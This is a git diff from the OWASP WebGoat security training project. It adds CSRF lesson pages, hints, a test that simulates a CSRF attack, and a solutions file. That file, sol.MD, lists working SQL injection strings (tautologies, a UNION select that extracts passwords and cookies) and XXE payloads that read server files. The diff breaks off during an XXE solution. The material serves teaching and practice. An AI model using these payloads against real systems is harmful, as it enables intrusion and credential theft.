+<div class="lesson-page-wrapper">
     <div class="adoc-content" th:replace="doc:CSRF_GET.adoc"></div>
-    </div>
+</div>
 
-    <div class="lesson-page-wrapper">
+<div class="lesson-page-wrapper">
     <div class="adoc-content" th:replace="doc:CSRF_Get_Flag.adoc"></div>
 
     <form accept-charset="UNKNOWN" id="basic-csrf-get"
@@ -18,8 +18,8 @@
           successCallback=""
           action="/WebGoat/csrf/basic-get-flag"
           enctype="application/json;charset=UTF-8">
-            <input name="csrf" type="hidden" value="false" />
-            <input type="submit" name="ubmit=" />
+        <input name="csrf" type="hidden" value="false"/>
+        <input type="submit" name="ubmit="/>
 
     </form>
 
@@ -37,7 +37,7 @@
               enctype="application/json;charset=UTF-8">
 
             Confirm Flag Value:
-                    <input type="text" length="6" name="confirmFlagVal" value="" />
+            <input type="text" length="6" name="confirmFlagVal" value=""/>
 
             <input name="submit" value="Submit" type="submit"/>
 
@@ -46,9 +46,9 @@
         <div class="attack-feedback"></div>
         <div class="attack-output"></div>
     </div>
-    </div>
+</div>
 
-    <div class="lesson-page-wrapper">
+<div class="lesson-page-wrapper">
 
     <div class="adoc-content" th:replace="doc:CSRF_Reviews.adoc"></div>
 
@@ -58,6 +58,7 @@
 
     <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 
+    <div class="attack-container">
         <div class="container-fluid">
             <div class="panel post">
                 <div class="post-heading">
@@ -89,9 +90,10 @@
                                   method="POST" name="review-form"
                                   successCallback=""
                                   action="/WebGoat/csrf/review">
-                                <input class="form-control" id="reviewText" name="reviewText" placeholder="Add a Review" type="text"/>
-                                <input class="form-control" id="reviewStars" name="stars" type="text" />
-                                <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9" />
+                                <input class="form-control" id="reviewText" name="reviewText" placeholder="Add a Review"
+                                       type="text"/>
+                                <input class="form-control" id="reviewStars" name="stars" type="text"/>
+                                <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9"/>
                                 <input type="submit" name="submit" value="Submit review"/>
                             </form>
                             <div class="attack-feedback"></div>
@@ -108,14 +110,144 @@
                 </div>
             </div>
         </div>
+    </div>
     <!-- end comments -->
 
 
+</div>
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:CSRF_Frameworks.adoc"></div>
+</div>
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:CSRF_JSON.adoc"></div>
+</div>
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:CSRF_ContentType.adoc"></div>
+
+    <script th:src="@{/lesson_js/feedback.js}" language="JavaScript"></script>
+    <div style="container-fluid; background-color: #f1f1f1; border: 2px solid #a66;
+  border-radius: 12px;
+  padding: 7px;
+  margin-top:7px;
+  padding:5px;">
+        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+        <div class="container-fluid">
+            <div class="row">
+                <div class="col-md-8">
+                    <div class="well well-sm">
+                        <form class="attack-form" accept-charset="UNKNOWN" id="csrf-feedback"
+                              method="POST"
+                              prepareData="feedback"
+                              action="/WebGoat/csrf/feedback/message"
+                              contentType="application/json">
+                            <div class="row">
+                                <div class="col-md-6">
+                                    <div class="form-group">
+                                        <label for="name">
+                                            Name</label>
+                                        <input type="text" class="form-control" name="name" id="name"
+                                               placeholder="Enter name"
+                                               required="required"/>
+                                    </div>
+                                    <div class="form-group">
+                                        <label for="email">
+                                            Email Address</label>
+                                        <div class="input-group">
+                                <span class="input-group-addon"><span class="glyphicon glyphicon-envelope"></span>
+                                </span>
+                                            <input type="email" name="email" class="form-control" id="email"
+                                                   placeholder="Enter email"
+                                                   required="required"/></div>
+                                    </div>
+                                    <div class="form-group">
+                                        <label for="subject">
+                                            Subject</label>
+                                        <select id="subject" name="subject" class="form-control" required="required">
+                                            <option value="na" selected="">Choose One:</option>
+                                            <option value="service">General Customer Service</option>
+                                            <option value="suggestions">Suggestions</option>
+                                            <option value="product">Product Support</option>
+                                        </select>
+                                    </div>
+                                </div>
+                                <div class="col-md-6">
+                                    <div class="form-group">
+                                        <label for="name">
+                                            Message</label>
+                                        <textarea name="message" id="message" class="form-control" rows="9" cols="25"
+                                                  required="required"
+                                                  placeholder="Message"></textarea>
+                                    </div>
+                                </div>
+                                <div class="col-md-12">
+                                    <button class="btn btn-primary pull-right" id="btnContactUs">
+                                        Send Message
+                                    </button>
+                                </div>
+                            </div>
+                        </form>
+                    </div>
+                </div>
+            </div>
+        </div>
     </div>
 
-    <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:CSRF_Impact_Defense.adoc"></div>
+    <div class="attack-container">
+        <div class="assignment-success">
+            <i class="fa fa-2 fa-check hidden" aria-hidden="true">
+            </i>
         </div>
-    <!--</div>-->
+        <form class="attack-form" accept-charset="UNKNOWN" id="confirm-flag-feedback"
+              method="POST" name="form2"
+              action="/WebGoat/csrf/feedback"
+              enctype="application/json;charset=UTF-8">
+
+            Confirm Flag Value:
+            <input type="text" length="6" name="confirmFlagVal" value=""/>
+
+            <input name="submit" value="Submit" type="submit"/>
+
+        </form>
+
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
+    </div>
+
+</div>
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:CSRF_Login.adoc"></div>
+
+    <div class="attack-container">
+        <div class="assignment-success">
+            <i class="fa fa-2 fa-check hidden" aria-hidden="true">
+            </i>
+        </div>
+        <form class="attack-form" accept-charset="UNKNOWN" id="confirm-flag-login"
+              method="POST" name="form2"
+              action="/WebGoat/csrf/login"
+              enctype="application/json;charset=UTF-8">
+
+            Press the button below when your are logged in as the other user<br/>
+
+            <input name="submit" value="Solved!" type="submit"/>
+
+        </form>
+
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
+    </div>
+</div>
+
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:CSRF_Impact_Defense.adoc"></div>
+</div>
+
+
+<!--</div>-->
 
 </html>

webgoat-lessons/csrf/src/main/resources/i18n/WebGoatLabels.properties

@@ -17,3 +17,16 @@ csrf-review.success=It appears you have submitted correctly from another site. G
 csrf-review-hint1=Again, you will need to submit from an external domain/host to trigger this action. While CSRF can often be triggered from the same host (e.g. via persisted payload), this doesn't work that way.
 csrf-review-hint2=Remember, you need to mimic the existing workflow/form.
 csrf-review-hint3=This one has a weak anti-CSRF protection, but you do need to overcome (mimic) it
+
+csrf-feedback-hint1=Look at the content-type.
+csrf-feedback-hint2=Try to post the same message with content-type text/plain
+csrf-feedback-hint3=The json can be put into a hidden field inside 
+
+csrf-feedback-invalid-json=Invalid JSON received.
+csrf-feedback-success=Congratulations you have found the correct solution, the flag is: {0}
+
+csrf-login-hint1=First create a new account with csrf-username
+csrf-login-hint2=Create a form which will log you in as this user (hint 1) and upload it to WebWolf
+csrf-login-hint3=Visit this assignment again
+csrf-login-success=Congratulations, now log out and login with your normal user account within WebGoat, remember the attacker knows you solved this assignment
+csrf-login-failed=The solution is not correct, you are clicking the button while logged in as {0}

webgoat-lessons/csrf/src/main/resources/js/feedback.js

@@ -0,0 +1,7 @@
+webgoat.customjs.feedback = function() {
+    var data = {};
+    $('#csrf-feedback').find('input, textarea, select').each(function(i, field) {
+        data[field.name] = field.value;
+    });
+    return JSON.stringify(data);
+}

webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_ContentType.adoc

@@ -0,0 +1,23 @@
+== CSRF and content-type
+
+In the previous section we saw how relying on the content-type is not a protection against
+CSRF. In this section we will look into another way we can perform a CSRF attack against
+a APIs which are not protected against CSRF.
+
+In this assignment you need to achieve to POST the following JSON message to our endpoints:
+
+[source]
+----
+POST /csrf/feedback HTTP/1.1
+
+{
+  "name"    : "WebGoat",
+  "email"   : "webgoat@webgoat.org"
+  "content" : "WebGoat is the best!!"
+}
+----
+
+More information can be found http://pentestmonkey.net/blog/csrf-xml-post-request[here]
+
+Remember you need to make the call from another origin (WebWolf can help here) and you need to be logged in into
+WebGoat.

webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Frameworks.adoc

@@ -0,0 +1,22 @@
+=== Automatic support from frameworks
+
+Most frameworks now have default support for preventing CSRF. For example with Angular an interceptor reads a token
+from a cookie by default XSRF-TOKEN and sets it as an HTTP header, X-XSRF-TOKEN. Since only code that runs on your domain
+could read the cookie, the backend can be certain that the HTTP request came from your client application and not an attacker.
+
+In order for this to work the backend server sets the token in a cookie. As the value of the cookie should be read
+by Angular (JavaScript) this cookie should not be marked with the http-only flag. On every request towards the server
+Angular will put the token in the X-XSRF-TOKEN as a HTTP header. The server can validate whether those two tokens
+match and this will ensure the server the request is running on the same domain.
+
+*Important: DEFINE A SEPARATE COOKIE, DO NOT REUSE THE SESSION COOKIE*
+
+Remember the session cookie should always be defined with http-only flag.
+
+Another effective defense can be to add a custom request header to each call. This will work if all the interactions
+with the server are performed with JavaScript. On the server side you only need to check the presence of this header
+if this header is not present deny the request.
+
+
+
+

webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_JSON.adoc

@@ -0,0 +1,46 @@
+**But I only have JSON APIs and no CORS enabled, how can those be susceptible to CSRF?**
+
+A lot of web applications implement no protection against CSRF they are somehow protected by the fact that
+they only work with `application/json` as content type. The only way to make a request with this content-type from the
+browser is with a XHR request. Before the browser can make such a request a preflight request will be made towards
+the server (remember the CSRF request will be cross origin). If the preflight response does not allow the cross origin
+request the browser will not make the call.
+
+To make a long answer short: this is *not* a valid protection against CSRF.
+
+One example why this protection is not enough can be found https://bugs.chromium.org/p/chromium/issues/detail?id=490015[here].
+Turns out `Navigator.sendBeacon()` was allowed to send POST request with an arbitrary content-type.
+
+[qoute, developer.mozilla.org]
+____
+The navigator.sendBeacon() method can be used to asynchronously transfer a small amount of
+data over HTTP to a web server. This method addresses the needs of analytics and diagnostics
+code that typically attempts to send data to a web server prior to the unloading of the
+document. Sending the data any sooner may result in a missed opportunity to gather data..."
+____
+
+{nbsp} +
+For example:
+
+[source]
+----
+function postBeacon() {
+    var data= new Blob([JSON.stringify({"author" :"WebGoat"})], {type : 'application/json'});
+    navigator.sendBeacon("http://localhost:8083", data)
+}
+----
+
+[quote, Eduardo Vela]
+____
+I think Content-Type restrictions are useful for websites that are accidentally safe against CSRF. They are not meant to be, but they are because they happen to only accept XML or JSON payloads.
+
+That said, it's somewhat obvious the websites depending on this behavior should be fixed, and any reputable pentesters will point that out. The issue is whether it's the browser responsibility to act as a nanny to weak websites, or we should leave weak websites as sacrifice for great justice. Survival of the fittest.
+
+IMHO, the answer is somewhere in between, and a good first step would be to document all these Same Origin Policy gotchas that websites might depend upon for security.
+
+But wrt to this bug in specific, if it never got fixed, I don't think it would be the end of the world. But then again, on this day and age, maybe there's a way to launch nuclear missiles with a XML RPC interface, so maybe it would be the end of the world.
+____
+
+{nbsp} +
+Both Firefox and Chrome fixed this issue, but it shows why you should implement a CSRF protection instead
+of relying on the content-type of your APIs.

webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Login.adoc

@@ -0,0 +1,24 @@
+:blank: pass:[ +]
+
+== Login CSRF attack
+
+In a login CSRF attack, the attacker forges a login request to an honest site using the attacker’s username 
+and password at that site. If the forgery succeeds, the honest server responds with a `Set-Cookie` header 
+that instructs the browser to mutate its state by storing a session cookie, logging the user into
+the honest site as the attacker. This session cookie is used to bind subsequent requests to the user’s session and hence
+to the attacker’s authentication credentials. Login CSRF attacks can have serious consequences, for example 
+see the picture below where an attacker created an account at google.com the victim visits the malicious
+website and the user is logged in as the attacker. The attacker could then later on gather information about
+the activities of the user.
+
+{blank}
+
+image::images/login-csrf.png[caption="Figure: ", title="Login CSRF from Robust Defenses for Cross-Site Request Forgery", width="800", height="500", style="lesson-image" link="http://seclab.stanford.edu/websec/csrf/csrf.pdf"]
+
+{blank}
+For more information read the following http://seclab.stanford.edu/websec/csrf/csrf.pdf[paper]
+
+In this assignment try to see if WebGoat is also vulnerable for a login CSRF attack. First create a user 
+based on your own username prefixed with csrf. So if your username is `tom` you must create
+a new user called `csrf-tom`
+

webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Reviews.adoc

@@ -1,9 +1,9 @@
 == Post a review on someone else's behalf
 
-The page below simulates a comment/review page.  The difference here is that you have to inititate the submission elsewhere as you might
+The page below simulates a comment/review page.  The difference here is that you have to initiate the submission elsewhere as you might
 with a CSRF attack and like the previous exercise. It's easier than you think. In most cases, the trickier part is
 finding somewhere that you want to execute the CSRF attack. The classic example is account/wire transfers in someone's bank account.
 
-But we're keepoing it simple here.  In this case, you just need to trigger a review submission on behalf of the currently
+But we're keeping it simple here.  In this case, you just need to trigger a review submission on behalf of the currently
 logged in user.
 

webgoat-lessons/csrf/src/test/java/org/owasp/webgoat/plugin/CSRFFeedbackTest.java

@@ -0,0 +1,58 @@
+package org.owasp.webgoat.plugin;
+
+import org.hamcrest.core.StringContains;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.owasp.webgoat.plugins.LessonTest;
+import org.springframework.http.MediaType;
+import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
+import javax.servlet.http.Cookie;
+
+import static org.hamcrest.core.Is.is;
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
+/**
+ * @author nbaars
+ * @since 11/17/17.
+ */
+@RunWith(SpringJUnit4ClassRunner.class)
+public class CSRFFeedbackTest extends LessonTest {
+
+    @Before
+    public void setup() throws Exception {
+        CSRF csrf = new CSRF();
+        when(webSession.getCurrentLesson()).thenReturn(csrf);
+        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+        when(webSession.getUserName()).thenReturn("unit-test");
+    }
+
+    @Test
+    public void postingJsonMessageThroughWebGoatShouldWork() throws Exception {
+        mockMvc.perform(post("/csrf/feedback/message")
+                .contentType(MediaType.APPLICATION_JSON)
+                .content("{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\": \"service\", \"message\":\"dsaffd\"}"))
+                .andExpect(status().isOk());
+    }
+
+
+    @Test
+    public void csrfAttack() throws Exception {
+        mockMvc.perform(post("/csrf/feedback/message")
+                .contentType(MediaType.TEXT_PLAIN)
+                .cookie(new Cookie("JSESSIONID", "test"))
+                .header("host", "localhost:8080")
+                .header("referer", "webgoat.org")
+                .content("{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\": \"service\", \"message\":\"dsaffd\"}"))
+                .andExpect(jsonPath("lessonCompleted", is(true)))
+                .andExpect(jsonPath("feedback", StringContains.containsString("the flag is: ")));
+    }
+
+
+
+}

webgoat-lessons/csrf/webgoat-lesson-template/getting-started.txt

@@ -1,55 +0,0 @@
-##### To include lesson template in build #####
-1. edit theh webgoat-server/pom.xml file and uncomment the section under ...
-<!--uncommment below to run/include lesson template in WebGoat Build-->
-
-2. Also uncomment in webgoat-lessons/pom.xml where it says ...
-<!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
-
-##### To add a lesson to WebGoat #####
-
-There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
-
-0. The POM file
-	a. change the ...
-	<artifactId>webgoat-lesson-template</artifactId>
-	... line to give your lesson its own artifactId.That should be all you need to do there
-
-1.	The Base Class ...
-	In webgoat-lessons/{your-lesson}/src/main/java, refactor the LessonTemplate.java class, changing ...
-	a. the category in which you want your lesson to be in.  You can create a new category if you want, or put in an issue to have one added
-	b. The 'defaultRanking' will move your lesson up or down in the categories list
-	c. implement a new key name pair "lesson-template.title" (the key) and update the same key/value pair (your.key=your value) in src/main/resources/i18n/WebGoatLabels.properties
-	d. Implement a new value for the getId method, which leads us to ...
-
-2. The HTML content framing ...
-	a. Rename the provided file in src/main/resources/html using your value from the getId method in your lesson's base class (e.g. public String getId() { return "your-lesson";  } >> "your-lesson.html")
-	b. Modify that file following the commented instructions in there
-	c. In conjunction with this file you
-
-3. Assignment Endpoints
-	a. In the above html file, you will see an example of an 'attack form'.  You can create endpoints to handle these attacks and provide the user feedback and simulated output.  See the example file here as well as other existing lessons for ways to extend these.  You will extend the AssignmentEndpoint as the example will show
-	b. You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
-	c. See other lesson examples for creating unit/integration tests for your project as well
-
-
-4. Getting your lesson to show up
-	a. modify the webgoat-lessons/pom.xml to include your project in the <modules> section
-	<modules>
-		<!-- ... -->
-		<module>webgoat-lesson-template</module>
-		<!-- ... -->
-	</modules>
-
-	b. modify the webgoat-server/pom.xml to add your project as a dependency in the <dependencies> section ...
-	<dependencies>
-		<!-- .... >
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>your-artfifact-id-here</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <!-- .... >
-    <dependencies>
-
-
-5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template

webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/webgoat/plugin/SampleAttack.java

@@ -1,62 +0,0 @@
-package org.owasp.webgoat.plugin;
-
-import com.google.common.collect.Lists;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentPath;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.web.bind.annotation.PathVariable;
-import org.springframework.web.bind.annotation.GetMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-import javax.servlet.ServletException;
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-import java.io.IOException;
-import java.util.HashMap;
-import java.util.List;
-
-import java.util.Map;
-
-/**
- * Created by jason on 1/5/17.
- */
-
-@AssignmentPath("/lesson-template/sample-attack")
-public class SampleAttack extends AssignmentEndpoint {
-
-    String secretValue = "secr37Value";
-
-    //UserSessionData is bound to session and can be used to persist data across multiple assignments
-    @Autowired
-    UserSessionData userSessionData;
-
-
-    @GetMapping(produces = {"application/json"})
-    public @ResponseBody
-    AttackResult completed(String param1, String param2, HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
-
-
-        if (userSessionData.getValue("some-value") != null) {
-            // do any session updating you want here ... or not, just comment/example here
-            //return trackProgress(failed().feedback("lesson-template.sample-attack.failure-2").build());
-        }
-
-        //overly simple example for success. See other existing lesssons for ways to detect 'success' or 'failure'
-        if (secretValue.equals(param1)) {
-            return trackProgress(success()
-                    .output("Custom Output ...if you want, for success")
-                    .feedback("lesson-template.sample-attack.success")
-                    .build());
-            //lesson-template.sample-attack.success is defined in src/main/resources/i18n/WebGoatLabels.properties
-        }
-
-        // else
-        return trackProgress(failed()
-                .feedback("lesson-template.sample-attack.failure-2")
-                .output("Custom output for this failure scenario, usually html that will get rendered directly ... yes, you can self-xss if you want")
-                .build());
-    }
-
-}

webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/html/LessonTemplate.html

@@ -1,54 +0,0 @@
-<html xmlns:th="http://www.thymeleaf.org">
-
-    <div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-        <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-        which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lesson-template-intro.adoc"></div>
-    </div>
-
-    <div class="lesson-page-wrapper">
-        <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
-        <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lesson-template-video.adoc"></div>
-        <!-- can use multiple adoc's in a page-wrapper if you want ... or not-->
-        <div class="adoc-content" th:replace="doc:lesson-template-attack.adoc"></div>
-
-        <!-- WebGoat will automatically style and scaffold some functionality by using the div.attack-container as below -->
-        <div class="attack-container">
-            <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-            <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
-            <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
-            <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
-
-            <!-- modify the action to point to the intended endpoint and set other attributes as desired -->
-            <script th:src="@{/lesson_js/idor.js}" />
-            <form class="attack-form" accept-charset="UNKNOWN"
-                  method="GET" name="form"
-                  action="/WebGoat/lesson-template/sample-attack"  
-                  enctype="application/json;charset=UTF-8">
-                <table>
-                    <tr>
-                        <td>two random params</td>
-                        <td>parameter 1:<input name="param1" value="" type="TEXT" /></td>
-                        <td>parameter 2:<input name="param2" value="" type="TEXT" /></td>
-                        <td>
-                            <input
-                                name="submit" value="Submit" type="SUBMIT"/>
-                        </td>
-                    </tr>
-                </table>
-            </form>
-            <!-- do not remove the two following div's, this is where your feedback/output will land -->
-            <!-- the attack response will include a 'feedback' and that will automatically go here -->
-            <div class="attack-feedback"></div>
-            <!-- output is intended to be a simulation of what the screen would display in an attack -->
-            <div class="attack-output"></div>
-        </div>
-    </div>
-
-    <!-- repeat and mix-and-match the lesson-page-wrappers with or wihtout the attack-containers as you like ...
-        see other lessons for other more complex examples -->
-
-</html>

webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/i18n/WebGoatLabels.properties

@@ -1,7 +0,0 @@
-lesson-template.title=Lesson Template
-
-lesson-template.sample-attack.failure-1=Sample failure message
-lesson-template.sample-attack.failure-2=Sample failure message 2
-
-lesson-template.sample-attack.success=Sample success message
-

webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/js/idor.js

@@ -1,18 +0,0 @@
-// need custom js for this?
-
-webgoat.customjs.idorViewProfile = function(data) {
-    webgoat.customjs.jquery('#idor-profile').html(
-        'name:' + data.name + '<br/>'+
-        'color:' + data.color + '<br/>'+
-        'size:' + data.size + '<br/>'
-    );
-}
-
-var onViewProfile = function () {
-    console.warn("on view profile activated")
-    webgoat.customjs.jquery.ajax({
-        method: "GET",
-        url: "/WebGoat/IDOR/profile",
-        contentType: 'application/json; charset=UTF-8'
-     }).then(webgoat.customjs.idorViewProfile);
-}

webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-attack.adoc

@@ -1,3 +0,0 @@
-=== Attack Explanation
-
-Explanation of attack here ... Instructions etc.

webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-intro.adoc

@@ -1,19 +0,0 @@
-
-== Lesson Template Intro
-
-This is the lesson template intro.
-
-=== Sub-heading
-
-Check asciidoc for syntax, but more = means smaller headings.  You can *bold* text and other things.
-
-=== Structuring files
-
-You should set up all content so that it is these *.adoc files.
-
-=== Images
-
-Images can be refereneced as below including setting style (recommended to use lesson-image as the style). The root is {lesson}/src/main/resources
-
-image::images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
-

webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video.adoc

@@ -1,7 +0,0 @@
-=== More Content, Video too ...
-
-You can structure and format the content however you like. You can even include video if you like (but may be subject to browser support). You may want to make it more pertinent to web application security than this though.
-
-video::video/sample-video.m4v[width=480,start=5]
-
-see http://asciidoctor.org/docs/asciidoc-syntax-quick-reference/#videos for more detail on video syntax

webgoat-lessons/html-tampering/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
     <dependencies>

webgoat-lessons/http-basics/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 </project>

webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc

@@ -1,8 +1,8 @@
 
-Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP	request. 
-
-The user should become familiar with the features of WebGoat by manipulating the above buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP ZAP Attack Proxy to see the HTTP data.
+Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the
+input and display it back to the user, illustrating the basics of handling an HTTP request.
 
 == Try It!
 
-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
+Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input
+and display it back to the user, illustrating the basics of handling an HTTP request.

webgoat-lessons/http-proxies/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
     <dependencies>

webgoat-lessons/idor/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 </project>

webgoat-lessons/insecure-login/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
     <dependencies>

webgoat-lessons/jwt/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 </project>

webgoat-lessons/missing-function-ac/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 </project>

webgoat-lessons/pom.xml

@@ -5,12 +5,12 @@
     <groupId>org.owasp.webgoat.lesson</groupId>
     <artifactId>webgoat-lessons-parent</artifactId>
     <packaging>pom</packaging>
-    <version>8.0.0.M2</version>
+    <version>8.0.0.M3</version>
 
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
     <modules>
@@ -27,6 +27,7 @@
         <module>xxe</module>
         <module>idor</module>
         <module>vulnerable-components</module>
+        <module>webgoat-introduction</module>
         <module>webwolf-introduction</module>
 	    <module>auth-bypass</module>
         <module>missing-function-ac</module>
@@ -42,34 +43,13 @@
             <version>${project.version}</version>
             <scope>provided</scope>
             <type>jar</type>
-            <!-- Exclude Mongo embedded so testcases do not start it automatically, seems to be
-                 the easiest way to stop the autoconfiguration of Spring Boot -->
-            <exclusions>
-                <exclusion>
-                    <groupId>de.flapdoodle.embed</groupId>
-                    <artifactId>de.flapdoodle.embed.mongo</artifactId>
-                </exclusion>
-            </exclusions>
         </dependency>
-        <!--<dependency>-->
-        <!--<groupId>org.apache.commons</groupId>-->
-        <!--<artifactId>commons-exec</artifactId>-->
-        <!--<version>1.3</version>-->
-        <!--</dependency>-->
         <dependency>
             <groupId>org.owasp.webgoat</groupId>
             <artifactId>webgoat-container</artifactId>
             <version>${project.version}</version>
             <classifier>tests</classifier>
             <scope>test</scope>
-            <!-- Exclude Mongo embedded so testcases do not start it automatically, seems to be
-                 the easiest way to stop the autoconfiguration of Spring Boot -->
-            <exclusions>
-                <exclusion>
-                    <groupId>de.flapdoodle.embed</groupId>
-                    <artifactId>de.flapdoodle.embed.mongo</artifactId>
-                </exclusion>
-            </exclusions>
         </dependency>
         <dependency>
             <groupId>junit</groupId>
@@ -95,12 +75,6 @@
             <version>4.1.3.RELEASE</version>
             <scope>test</scope>
         </dependency>
-        <dependency>
-            <groupId>com.github.fakemongo</groupId>
-            <artifactId>fongo</artifactId>
-            <version>2.1.0</version>
-            <scope>test</scope>
-        </dependency>
         <dependency>
             <groupId>org.owasp.encoder</groupId>
             <artifactId>encoder</artifactId>

webgoat-lessons/sol.MD

@@ -0,0 +1,111 @@
+### SQLi ###  
+
+Basic  
+Smith - to show it returns smith's records.    
+To show exploit; `1=1` can be any true clause:  
+
+```sql  
+Smith' or '1'='1   
+```
+
+**Bender Login**  
+```sql
+bender@juice-sh.op' --  
+```
+```sql 
+[2:19 PM]  
+101
+101 or 1=1
+```  
+```sql 
+Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+```  
+
+## XXE ##
+
+Simple:  
+```xml 
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>  
+```
+
+Modern Rest Framework:  
+Change content type to: `Content-Type: application/xml` and 
+```xml  
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+```  
+
+Blind SendFile   
+```xml
+  
+      Solution:
+     
+      Create DTD:
